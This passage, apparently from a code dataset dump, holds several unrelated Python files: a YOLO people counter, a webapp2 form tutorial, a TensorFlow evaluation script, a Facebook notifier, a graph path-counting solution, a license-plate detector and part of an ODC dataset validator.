open(\"coco.names\").read().strip().split(\"\\n\")\r\n\r\nnet = cv2.dnn.readNetFromDarknet(\"yolov3.cfg\", \"yolov3.weights\")\r\n\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\r\n\r\nln = net.getLayerNames()\r\nln = [ln[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n\r\n#img = cv2.imread('more_count.jpg')\r\nimg = cv2.imread('less_count.jpg')\r\n\r\n\r\n\r\nwhile True:\r\n frame = imutils.resize(img, width= 700)\r\n results = detect_people_classes(frame, net, ln, personIdx=labels.index(\"person\"))\r\n\r\n \r\n\r\n \r\n\r\n for (i, (prob, bbox, centroid,w,h)) in enumerate(results):\r\n (start_x, start_y, end_x, end_y) = bbox\r\n (cX, cY) = centroid\r\n\r\n if len(results) >=6:\r\n color = (0, 0, 255)\r\n else:\r\n color = (0, 255, 0)\r\n\r\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), color, 2)\r\n # cv2.circle(frame, (cX, cY), 5, color, 1)\r\n\r\n\r\n cv2.imshow(\"frame\", frame)\r\n key =cv2.waitKey(1) & 0xFF\r\n\r\n if key == ord(\"q\"):\r\n break\r\n\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"count_image.py","file_name":"count_image.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202852392","text":"import webapp2\nimport cgi\nimport re\n\n\nform = \"\"\"\n\n\n\n\n\"\"\"\n\nbirthdayDayForm=\"\"\"\n\n
\n\t\n\tWhat is your birthday?\n\t
\n\n\t\n\n\t\t\n\n\t\n\n
%(error)s
\n\n\t\n
\n\n\"\"\"\n\nsignupForm=\"\"\"\n\n
\n \n \n\n \n\n \n\n \n\n \n\n \n
\n\n\n\"\"\"\n\n\ndef escape_html(s):\n return cgi.escape(s, quote=True)\n\ndef valid_month(month):\n months = ['January','February','March','April','May','June','July','August','September','October','November','December']\n month_abbvs = dict((m[:3].lower(),m) for m in months)\n if month:\n short_month = month[:3].lower()\n return month_abbvs.get(short_month)\n\n \ndef valid_day(day):\n if day.isdigit():\n day = int(day)\n if(day>=1 and day<=31):\n return day\n return None\n\n\ndef valid_year(year):\n if year.isdigit():\n year = int(year)\n if(year>=1900 and year<=2020):\n return year\n return None\n\n\nUSER_RE = re.compile(r\"^[a-zA-Z0-9_-]{3,20}$\")\ndef valid_username(username):\n return USER_RE.match(username)\n\nclass MainPage(webapp2.RequestHandler):\n\n def write_form(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n self.response.out.write(birthdayDayForm % {\"error\": error,\n \"month\": escape_html(month),\n \"day\": escape_html(day),\n \"year\": escape_html(year)\n })\n\n def get(self):\n self.response.out.write(form)\n self.write_form()\n\n def post(self):\n\n month = self.request.get('month')\n day = self.request.get('day')\n year = self.request.get('year')\n\n user_month = valid_month(self.request.get('month'))\n user_day = valid_day(self.request.get('day'))\n user_year = valid_year(self.request.get('year'))\n\n if not(user_month and user_day and user_year):\n self.write_form(\"That does't look valide to me\", month, day, year)\n else:\n self.redirect('/thanks')\n\n\nclass ThanksHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write(\"Thanks for the submission\")\n\n\nclass SignUpHandler(webapp2.RequestHandler):\n def write_form(self, error=\"\", username=\"\", password=\"\", verify=\"\", email=\"\"):\n self.response.out.write(signupForm % {\"error\": error, \"username\": username, \n \"password\": password, \"verify\": verify,\n \"email\": email})\n\n def get(self):\n self.write_form()\n\n def post(self):\n username = self.request.get('username')\n\n username_valid = valid_username(username)\n\n if not (username_valid):\n self.write_form(\"Error in the sign up form\", username)\n else:\n self.redirect('/unit2/welcome?username=' + username)\n\n\n\nclass WelcomeHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('Welcome')\n\n\nclass TestHandler(webapp2.RequestHandler):\n\tdef post(self):\n\t\t#q = self.request.get(\"q\")\n\t\t#self.response.write(q)\n\t\tself.response.headers['Content-Type'] = 'text/text'\n\t\tself.response.out.write(self.request)\n\n\napp = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/unit2/signup', SignUpHandler),\n ('/unit2/welcome', WelcomeHandler),\n ('/thanks', ThanksHandler),\n ('/testform', TestHandler)\n\t], debug=True)","sub_path":"helloworld/tutorial1/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"174857125","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nimport argparse\nimport importlib\nimport os\nfrom datetime import datetime\nimport json\nimport glob\nimport itk\nimport sys\nimport csv\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport itertools\nfrom scipy import interp\n\n\nprint(\"Tensorflow version:\", tf.__version__)\n\nparser = argparse.ArgumentParser(description='Model evaluation', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('--json_tf', type=str, help='JSON file generated by tfRecords.py. Used to evaluate the model.', required=True)\nparser.add_argument('--json', type=str, help='JSON file with model description, created by train.py', required=True)\nparser.add_argument('--translate_label', type=bool, help='Builds translation table from the two json files. Only for classification evaluation and when ground truth differs from model prediction', default=False)\nparser.add_argument('--ps_device', help='Process device', type=str, default='/cpu:0')\nparser.add_argument('--w_device', help='Worker device', type=str, default='/cpu:0')\n\nargs = parser.parse_args()\n\njson_model_name = args.json\njson_tf_records = args.json_tf\n\nps_device = args.ps_device\nw_device = args.w_device\nclass_names = []\nwith open(json_model_name, \"r\") as f:\n model_description = json.load(f)\n model_name = os.path.join(os.path.dirname(json_model_name), model_description[\"model\"])\n neural_network = model_description[\"nn\"]\n if(\"description\" in model_description and \"enumerate\" in model_description[\"description\"]):\n class_dict = model_description[\"description\"][model_description[\"description\"][\"enumerate\"]][\"class\"]\n class_obj = {}\n for key in class_dict:\n class_obj[class_dict[key]] = key\n class_names = class_obj.values()\n\nprint('json', json_model_name)\nprint('json_tf', json_tf_records)\nprint('model_name', model_name)\nprint('neural_network', neural_network)\n\nprint('ps_device', ps_device)\nprint('w_device', w_device)\n\nnn = importlib.import_module(\"nn.\" + neural_network).NN()\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n if(model_description[\"batch_size\"]):\n batch_size = model_description[\"batch_size\"]\n else: \n batch_size = 1\n\n if(model_description[\"buffer_size\"]):\n buffer_size = model_description[\"buffer_size\"]\n else: \n buffer_size = 100\n\n nn.set_data_description(json_filename=json_tf_records)\n iterator = nn.inputs(batch_size=batch_size,\n num_epochs=1, \n buffer_size=buffer_size)\n\n data_tuple = iterator.get_next()\n\n y_conv = nn.inference(data_tuple=data_tuple, keep_prob=1.0, is_training=False, ps_device=ps_device, w_device=w_device)\n metrics_eval = nn.metrics(y_conv, data_tuple)\n y_conv = nn.predict(y_conv)\n summary_op = tf.summary.merge_all()\n\n with tf.Session() as sess:\n\n sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n saver = tf.train.Saver()\n saver.restore(sess, model_name)\n\n summary_path = model_name + \"-eval\"\n summary_writer = tf.summary.FileWriter(summary_path, sess.graph)\n\n print(\"I am self aware!\")\n\n sess.run([iterator.initializer])\n\n step = 0 \n\n y_pred_arr = []\n y_true_arr = []\n\n fpr_arr = []\n tpr_arr = []\n roc_auc_arr = []\n iou_arr = []\n\n abs_diff_arr = []\n mse_arr = []\n\n while True:\n try:\n\n y_pred, data_t, summary, metrics = sess.run([y_conv, data_tuple, summary_op, metrics_eval])\n\n # output some data to the log files for tensorboard\n summary_writer.add_summary(summary, step)\n summary_writer.flush()\n\n metrics_str = '|'\n\n for metric in metrics:\n metrics_str += \" %s = %.3f |\" % (metric, metrics[metric][0])\n\n print(metrics_str)\n\n if(nn.prediction_type() == \"class\"):\n y_pred_arr.extend(np.argmax(np.array(y_pred), axis=1))\n y_true_arr.extend(np.reshape(data_t[1], -1).tolist())\n elif(nn.prediction_type() == \"segmentation\"):\n fpr, tpr, _ = roc_curve(np.array(data_t[1]).reshape(-1), np.array(y_pred).reshape(-1), pos_label=1)\n roc_auc = auc(fpr,tpr)\n\n fpr_arr.append(fpr)\n tpr_arr.append(tpr)\n roc_auc_arr.append(roc_auc)\n\n y_pred_flat = np.array(y_pred).reshape((len(y_pred), -1))\n labels_flat = np.array(data_t[1]).reshape((len(y_pred), -1))\n\n for i in range(len(y_pred)):\n intersection = 2.0 * np.sum(y_pred_flat[i] * labels_flat[i]) + 1e-7\n union = np.sum(y_pred_flat[i]) + np.sum(labels_flat[i]) + 1e-7\n iou_arr.append(intersection/union)\n\n elif(nn.prediction_type() == \"image\"):\n\n abs_diff_arr.extend(np.average(np.absolute(y_pred - data_t[1]).reshape([batch_size, -1]), axis=-1))\n mse_arr.extend(np.average(np.square(y_pred - data_t[1]).reshape([batch_size, -1]), axis=-1))\n \n\n step += 1\n\n except tf.errors.OutOfRangeError:\n break\n\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.3f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\nif(nn.prediction_type() == \"class\"):\n # Compute confusion matrix\n\n cnf_matrix = confusion_matrix(y_true_arr, y_pred_arr)\n np.set_printoptions(precision=3)\n\n # Plot non-normalized confusion matrix\n fig = plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, title='Confusion matrix, without normalization')\n confusion_filename = os.path.splitext(json_tf_records)[0] + \"_confusion.png\"\n fig.savefig(confusion_filename)\n # Plot normalized confusion matrix\n fig2 = plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True, title='Normalized confusion matrix')\n\n norm_confusion_filename = os.path.splitext(json_tf_records)[0] + \"_norm_confusion.png\"\n fig2.savefig(norm_confusion_filename)\n\nelif(nn.prediction_type() == \"segmentation\"):\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr for fpr in fpr_arr]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(len(fpr_arr)):\n mean_tpr += interp(all_fpr, fpr_arr[i], tpr_arr[i])\n\n mean_tpr /= len(fpr_arr)\n\n roc_auc = auc(all_fpr, mean_tpr)\n\n roc_fig = plt.figure()\n lw = 1\n plt.plot(all_fpr, mean_tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n\n roc_filename = os.path.splitext(json_tf_records)[0] + \"_roc.png\"\n roc_fig.savefig(roc_filename)\n\n iou_obj = {}\n iou_obj[\"iou\"] = iou_arr\n\n iou_json = os.path.splitext(json_tf_records)[0] + \"_iou_arr.json\"\n\n with open(iou_json, \"w\") as f:\n f.write(json.dumps(iou_obj))\n\n iou_fig_polar = plt.figure()\n ax = iou_fig_polar.add_subplot(111, projection='polar')\n theta = 2 * np.pi * np.arange(len(iou_arr))/len(iou_arr)\n colors = iou_arr\n ax.scatter(theta, iou_arr, c=colors, cmap='autumn', alpha=0.75)\n ax.set_rlim(0,1)\n plt.title('Intersection over union')\n locs, labels = plt.xticks()\n plt.xticks(locs, np.arange(0, len(iou_arr), round(len(iou_arr)/len(locs))))\n\n iou_polar_filename = os.path.splitext(json_tf_records)[0] + \"_iou_polar.png\"\n iou_fig_polar.savefig(iou_polar_filename)\n\n iou_fig = plt.figure()\n x_samples = np.arange(len(iou_arr))\n plt.scatter(x_samples, iou_arr, c=colors, cmap='autumn', alpha=0.75)\n plt.title('Intersection over union')\n iou_mean = np.mean(iou_arr)\n plt.plot(x_samples,[iou_mean]*len(iou_arr), label='Mean', linestyle='--')\n plt.text(len(iou_arr) + 2,iou_mean, '%.3f'%iou_mean)\n iou_stdev = np.std(iou_arr)\n stdev_line = plt.plot(x_samples,iou_mean + [iou_stdev]*len(iou_arr), label='Stdev', linestyle=':', alpha=0.75)\n stdev_line = plt.plot(x_samples,iou_mean - [iou_stdev]*len(iou_arr), label='Stdev', linestyle=':', alpha=0.75)\n plt.text(len(iou_arr) + 2,iou_mean + iou_stdev, '%.3f'%iou_stdev, alpha=0.75, fontsize='x-small')\n iou_filename = os.path.splitext(json_tf_records)[0] + \"_iou.png\"\n iou_fig.savefig(iou_filename)\n\nelif(nn.prediction_type() == \"image\"):\n abs_diff_arr = np.array(abs_diff_arr)\n abs_diff_fig = plt.figure()\n x_samples = np.arange(len(abs_diff_arr))\n plt.scatter(x_samples, abs_diff_arr, c=abs_diff_arr, cmap='cool', alpha=0.75, label='Mean absolute error')\n plt.xlabel('Samples')\n plt.ylabel('Absolute error')\n plt.title('Mean absolute error')\n\n abs_filename = os.path.splitext(json_tf_records)[0] + \"_abs_diff.png\"\n abs_diff_fig.savefig(abs_filename)\n\n mse_arr = np.array(mse_arr)\n mse_fig = plt.figure()\n plt.scatter(x_samples, mse_arr, c=mse_arr, cmap='cool', alpha=0.75, label='MSE')\n plt.xlabel('Samples')\n plt.ylabel('MSE')\n plt.title('Mean squared error')\n\n mse_filename = os.path.splitext(json_tf_records)[0] + \"_mse.png\"\n mse_fig.savefig(mse_filename)\n","sub_path":"src/py/dl/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262732187","text":"#!/usr/bin/env python\n#\n\n\"\"\"A Facebook application that uses AppEngine for user testimonials.\"\"\"\n\n\"\"\"Notifications Handler class\"\"\"\n\nimport urllib\nimport mytypes\nimport fbUtils\n\nclass DashboardError(Exception):\n def __init__(self, type, message):\n Exception.__init__(self, message)\n self.type = type\n \nclass Dashboard(object):\n def __init__(self, user, settings=None):\n self.user = user\n self.settings = settings\n \n def setCount(self, count=None):\n args = dict(uid = self.user.id) \n if not count:\n # Reset count\n args[\"count\"] = 0\n else:\n args[\"count\"] = count\n response = fbUtils.call_rest_api(self.user, 'dashboard.setCount', args)\n \n if response is False:\n raise DashboardError('DashboardError',\n 'setCount failed') \n return response\n\n","sub_path":"src/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"74660496","text":"import sys\nsys.setrecursionlimit(10**6)\nmod = (int)(1e9+7)\nn,m = map(int,input().split())\n\ng = [[] for _ in range(n+1)]\n\nc = [-1]*(n+1)\n\nfor _ in range(m):\n a,b = map(int,input().split())\n g[a].append(b)\n\ndef dfs(node):\n if node == n:\n return 1\n if c[node] !=-1:\n return c[node]\n cnt = 0\n for child in g[node]:\n cnt += dfs(child)\n c[node] = cnt%mod\n return c[node]\n\ndfs(1)\nprint(c[1])","sub_path":"Graph Algorithms/Game Routes/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260882587","text":"import cv2\nimport numpy as np\nimport imutils as im\nimport pytesseract\nfrom PIL import Image\n\n# Specifying the Path\ninput1 = 'car4.jpg'\n\n# Reading the Image\nimg = cv2.imread(input1)\n\n# Resizing the image to Standard Size\nnewwidth = 500\nimg = im.resize(img, width=newwidth)\n\n# Converting the image to grayscale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# Image Smoothing\nd, sigmaColor, sigmaSpace = 10, 15, 15\nflitered_img = cv2.bilateralFilter(gray, d, sigmaColor, sigmaSpace)\n\n# Canny Edge Detection\n# If intensity of pixel is greater than the upper threshold then pixel is accepted\n# If intensity of pixel is less than the lower threshold then pixel is rejected\n# If intensity of pixel is between lower threshold and upper threshold then pixel is accepted, only of it is connected to upper threshold\nlower, upper = 170, 200\nedged = cv2.Canny(flitered_img, lower, upper)\n\n# Finding Contours\ncontour, hierarchy = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n# Sorting contours according to there area\ncontour = sorted(contour, key=cv2.contourArea, reverse=True)[:10]\nprint('Number of Contours found: ' + str(len(contour)))\n\n# Iterating through all the contours\ncount = 0\nfor c in contour:\n perimeter = cv2.arcLength(c, True)\n epsilon = 0.01 * perimeter # Epsilon is basically the maximum distance from contour to approximated contour. It is an accuracy parameter.\n # This function below is used to find the approximate shape. Eg. If we want to find a square but we are not getting it so by using this func we can find the approx shape as of the square.\n approx = cv2.approxPolyDP(c, epsilon, True)\n if len(approx) == 4: # If approx has 4 corners\n print(approx)\n NumberPlateContour = approx\n count = 1\n break\n\nif count == 0:\n print('No License Plate Detected')\nelse:\n # Drawing all contours\n cv2.drawContours(img, [NumberPlateContour], -1, (0, 255, 0), 2)\n\n# # Now as the remaining image is not useful for us so we will mask that image\n# mask = np.zeros(gray.shape, np.uint8)\n# new_image = cv2.drawContours(mask, [NumberPlateContour], 0, 255, -1)\n# new_image = cv2.bitwise_and(img, img, mask=mask)\n#\n# # Now cropping this number plate from the masked image and recognising character from it using raspberry-pi\n# # Now Crop\n# (x, y) = np.where(mask == 255)\n# (topx, topy) = (np.min(x), np.min(y))\n# (bottomx, bottomy) = (np.max(x), np.max(y))\n# cropped = gray[topx:bottomx+1, topy:bottomy+1]\n#\n# # Now Character recognition using pytesseract it is a google based OCR\n# text = pytesseract.image_to_string(cropped, config='--psm 11')\n# print('Detected number on the License Plate is: ' + text)\n\ncv2.imshow('Result', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"License Plate Detection/detectLicensePlate.py","file_name":"detectLicensePlate.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"25396531","text":"\"\"\"\nValidate ODC dataset documents\n\"\"\"\nimport collections\nimport enum\nimport math\nimport multiprocessing\nimport os\nimport sys\nfrom datetime import datetime\nfrom functools import partial\nfrom pathlib import Path\nfrom textwrap import indent\nfrom typing import (\n Counter,\n Dict,\n Generator,\n Iterable,\n List,\n Optional,\n Sequence,\n Set,\n Tuple,\n Union,\n)\nfrom urllib.parse import urljoin, urlparse\nfrom urllib.request import urlopen\n\nimport attr\nimport ciso8601\nimport click\nimport numpy as np\nimport rasterio\nimport toolz\nfrom boltons.iterutils import get_path\nfrom click import echo, secho, style\nfrom datacube import Datacube\nfrom datacube.index.eo3 import prep_eo3\nfrom datacube.utils import InvalidDocException, changes, is_url, read_documents\nfrom datacube.utils.documents import load_documents\nfrom rasterio import DatasetReader\nfrom rasterio.crs import CRS\nfrom rasterio.errors import CRSError\nfrom shapely.validation import explain_validity\n\nfrom eodatasets3 import model, serialise, utils\nfrom eodatasets3.model import DatasetDoc\nfrom eodatasets3.ui import bool_style, is_absolute, uri_resolve\nfrom eodatasets3.utils import EO3_SCHEMA, default_utc\n\n\nclass Level(enum.Enum):\n info = 1\n warning = 2\n error = 3\n\n\nclass DocKind(enum.Enum):\n # EO3 datacube dataset.\n dataset = 1\n # Datacube product\n product = 2\n # Datacube Metadata Type\n metadata_type = 3\n # Stac Item\n stac_item = 4\n # Legacy datacube (\"eo1\") dataset\n legacy_dataset = 5\n # Legacy product config for ingester\n ingestion_config = 6\n\n\n# What kind of document each suffix represents.\n# (full suffix will also have a doc type: .yaml, .json, .yaml.gz etc)\n# Example: \"my-test-dataset.odc-metadata.yaml\"\nSUFFIX_KINDS = {\n \".odc-metadata\": DocKind.dataset,\n \".odc-product\": DocKind.product,\n \".odc-type\": DocKind.metadata_type,\n}\n# Inverse of above\nDOC_TYPE_SUFFIXES = {v: k for k, v in SUFFIX_KINDS.items()}\n\n\ndef filename_doc_kind(path: Union[str, Path]) -> Optional[\"DocKind\"]:\n \"\"\"\n Get the expected file type for the given filename.\n\n Returns None if it does not follow any naming conventions.\n\n >>> filename_doc_kind('LC8_2014.odc-metadata.yaml').name\n 'dataset'\n >>> filename_doc_kind('/tmp/something/water_bodies.odc-metadata.yaml.gz').name\n 'dataset'\n >>> filename_doc_kind(Path('/tmp/something/ls8_fc.odc-product.yaml')).name\n 'product'\n >>> filename_doc_kind(Path('/tmp/something/ls8_wo.odc-product.json.gz')).name\n 'product'\n >>> filename_doc_kind(Path('/tmp/something/eo3_gqa.odc-type.yaml')).name\n 'metadata_type'\n >>> filename_doc_kind(Path('/tmp/something/some_other_file.yaml'))\n \"\"\"\n\n for suffix in reversed(Path(path).suffixes):\n suffix = suffix.lower()\n if suffix in SUFFIX_KINDS:\n return SUFFIX_KINDS[suffix]\n\n return None\n\n\ndef guess_kind_from_contents(doc: Dict):\n \"\"\"\n What sort of document do the contents look like?\n \"\"\"\n if \"$schema\" in doc and doc[\"$schema\"] == EO3_SCHEMA:\n return DocKind.dataset\n if \"metadata_type\" in doc:\n if \"source_type\" in doc:\n return DocKind.ingestion_config\n return DocKind.product\n if (\"dataset\" in doc) and (\"search_fields\" in doc[\"dataset\"]):\n return DocKind.metadata_type\n if \"id\" in doc:\n if (\"lineage\" in doc) and (\"platform\" in doc):\n return DocKind.legacy_dataset\n\n if (\"properties\" in doc) and (\"datetime\" in doc[\"properties\"]):\n return DocKind.stac_item\n\n return None\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass ValidationMessage:\n level: Level\n code: str\n reason: str\n hint: str = None\n\n def __str__(self) -> str:\n hint = \"\"\n if self.hint:\n hint = f\" (Hint: {self.hint})\"\n return f\"{self.code}: {self.reason}{hint}\"\n\n\ndef _info(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.info, code, reason, hint=hint)\n\n\ndef _warning(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.warning, code, reason, hint=hint)\n\n\ndef _error(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.error, code, reason, hint=hint)\n\n\nValidationMessages = Generator[ValidationMessage, None, None]\n\n\ndef validate_dataset(\n doc: Dict,\n product_definition: Optional[Dict] = None,\n metadata_type_definition: Optional[Dict] = None,\n thorough: bool = False,\n readable_location: Union[str, Path] = None,\n expect_extra_measurements: bool = False,\n expect_geometry: bool = True,\n nullable_fields: Iterable[str] = (\"label\",),\n) -> ValidationMessages:\n \"\"\"\n Validate a a dataset document, optionally against the given product.\n\n By default this will only look at the metadata, run with thorough=True to\n open the data files too.\n\n :param product_definition: Optionally check that the dataset matches this product definition.\n :param thorough: Open the imagery too, to check that data types etc match.\n :param readable_location: Dataset location to use, if not the metadata path.\n :param expect_extra_measurements:\n Allow some dataset measurements to be missing from the product definition.\n This is (deliberately) allowed by ODC, but often a mistake.\n This flag disables the warning.\n \"\"\"\n schema = doc.get(\"$schema\")\n if schema is None:\n yield _error(\n \"no_schema\",\n f\"No $schema field. \"\n f\"You probably want an ODC dataset schema {model.ODC_DATASET_SCHEMA_URL!r}\",\n )\n return\n if schema != model.ODC_DATASET_SCHEMA_URL:\n yield _error(\n \"unknown_doc_type\",\n f\"Unknown doc schema {schema!r}. Only ODC datasets are supported ({model.ODC_DATASET_SCHEMA_URL!r})\",\n )\n return\n\n has_doc_errors = False\n for error in serialise.DATASET_SCHEMA.iter_errors(doc):\n has_doc_errors = True\n displayable_path = \".\".join(error.absolute_path)\n\n hint = None\n if displayable_path == \"crs\" and \"not of type\" in error.message:\n hint = \"epsg codes should be prefixed with 'epsg:1234'\"\n\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"structure\", f\"{context}{error.message} \", hint=hint)\n\n if has_doc_errors:\n return\n\n dataset = serialise.from_doc(doc, skip_validation=True)\n\n if not dataset.product.href:\n _info(\"product_href\", \"A url (href) is recommended for products\")\n\n yield from _validate_geo(dataset, expect_geometry=expect_geometry)\n\n # Note that a dataset may have no measurements (eg. telemetry data).\n # (TODO: a stricter mode for when we know we should have geo and measurement info)\n if dataset.measurements:\n for name, measurement in dataset.measurements.items():\n grid_name = measurement.grid\n if grid_name != \"default\" or dataset.grids:\n if grid_name not in dataset.grids:\n yield _error(\n \"invalid_grid_ref\",\n f\"Measurement {name!r} refers to unknown grid {grid_name!r}\",\n )\n\n if is_absolute(measurement.path):\n yield _warning(\n \"absolute_path\",\n f\"measurement {name!r} has an absolute path: {measurement.path!r}\",\n )\n\n yield from _validate_stac_properties(dataset)\n\n required_measurements: Dict[str, ExpectedMeasurement] = {}\n if product_definition is not None:\n required_measurements.update(\n {\n m.name: m\n for m in map(\n ExpectedMeasurement.from_definition,\n product_definition.get(\"measurements\") or (),\n )\n }\n )\n\n product_name = product_definition.get(\"name\")\n if product_name != dataset.product.name:\n # This is only informational as it's possible products may be indexed with finer-grained\n # categories than the original datasets: eg. a separate \"nrt\" product, or test product.\n yield _info(\n \"product_mismatch\",\n f\"Dataset product name {dataset.product.name!r} \"\n f\"does not match the given product ({product_name!r}\",\n )\n\n for name in required_measurements:\n if name not in dataset.measurements.keys():\n yield _error(\n \"missing_measurement\",\n f\"Product {product_name} expects a measurement {name!r})\",\n )\n measurements_not_in_product = set(dataset.measurements.keys()).difference(\n {m[\"name\"] for m in product_definition.get(\"measurements\") or ()}\n )\n if (not expect_extra_measurements) and measurements_not_in_product:\n things = \", \".join(sorted(measurements_not_in_product))\n yield _warning(\n \"extra_measurements\",\n f\"Dataset has measurements not present in product definition for {product_name!r}: {things}\",\n hint=\"This may be valid, as it's allowed by ODC. Set `expect_extra_measurements` to mute this.\",\n )\n\n if metadata_type_definition:\n # Datacube does certain transforms on an eo3 doc before storage.\n # We need to do the same, as the fields will be read from the storage.\n prepared_doc = prep_eo3(doc)\n\n for field_name, offsets in _get_field_offsets(\n metadata_type=metadata_type_definition\n ):\n if not any(_has_offset(prepared_doc, offset) for offset in offsets):\n readable_offsets = \" or \".join(\"->\".join(offset) for offset in offsets)\n yield _warning(\n \"missing_field\",\n f\"Dataset is missing field {field_name!r}\",\n hint=f\"Expected at {readable_offsets}\",\n )\n continue\n\n if field_name not in nullable_fields:\n value = None\n for offset in offsets:\n value = toolz.get_in(offset, prepared_doc)\n if value is None:\n yield _info(\n \"null_field\",\n f\"Value is null for configured field {field_name!r}\",\n )\n\n dataset_location = dataset.locations[0] if dataset.locations else readable_location\n\n # If we have a location:\n # For each measurement, try to load it.\n # If loadable:\n if thorough:\n for name, measurement in dataset.measurements.items():\n full_path = uri_resolve(dataset_location, measurement.path)\n expected_measurement = required_measurements.get(name)\n\n band = measurement.band or 1\n with rasterio.open(full_path) as ds:\n ds: DatasetReader\n\n if band not in ds.indexes:\n yield _error(\n \"incorrect_band\",\n f\"Measurement {name!r} file contains no rio index {band!r}.\",\n hint=f\"contains indexes {ds.indexes!r}\",\n )\n continue\n\n if not expected_measurement:\n # The measurement is not in the product definition\n #\n # This is only informational because a product doesn't have to define all\n # measurements that the datasets contain.\n #\n # This is historically because dataset documents reflect the measurements that\n # are stored on disk, which can differ. But products define the set of measurments\n # that are mandatory in every dataset.\n #\n # (datasets differ when, for example, sensors go offline, or when there's on-disk\n # measurements like panchromatic that GA doesn't want in their product definitions)\n if required_measurements:\n yield _info(\n \"unspecified_measurement\",\n f\"Measurement {name} is not in the product\",\n )\n else:\n expected_dtype = expected_measurement.dtype\n band_dtype = ds.dtypes[band - 1]\n # TODO: NaN handling\n if expected_dtype != band_dtype:\n yield _error(\n \"different_dtype\",\n f\"{name} dtype: \"\n f\"product {expected_dtype!r} != dataset {band_dtype!r}\",\n )\n\n ds_nodata = ds.nodatavals[band - 1]\n\n # If the dataset is missing 'nodata', we can allow anything in product 'nodata'.\n # (In ODC, nodata might be a fill value for loading data.)\n if ds_nodata is None:\n continue\n\n # Otherwise check that nodata matches.\n expected_nodata = expected_measurement.nodata\n if expected_nodata != ds_nodata and not (\n _is_nan(expected_nodata) and _is_nan(ds_nodata)\n ):\n yield _error(\n \"different_nodata\",\n f\"{name} nodata: \"\n f\"product {expected_nodata !r} != dataset {ds_nodata !r}\",\n )\n\n\ndef _has_offset(doc: Dict, offset: List[str]) -> bool:\n \"\"\"\n Is the given offset present in the document?\n \"\"\"\n for key in offset:\n if key not in doc:\n return False\n doc = doc[key]\n return True\n\n\ndef validate_product(doc: Dict) -> ValidationMessages:\n \"\"\"\n Check for common product mistakes\n \"\"\"\n\n # Validate it against ODC's product schema.\n has_doc_errors = False\n for error in serialise.PRODUCT_SCHEMA.iter_errors(doc):\n has_doc_errors = True\n displayable_path = \".\".join(map(str, error.absolute_path))\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"document_schema\", f\"{context}{error.message} 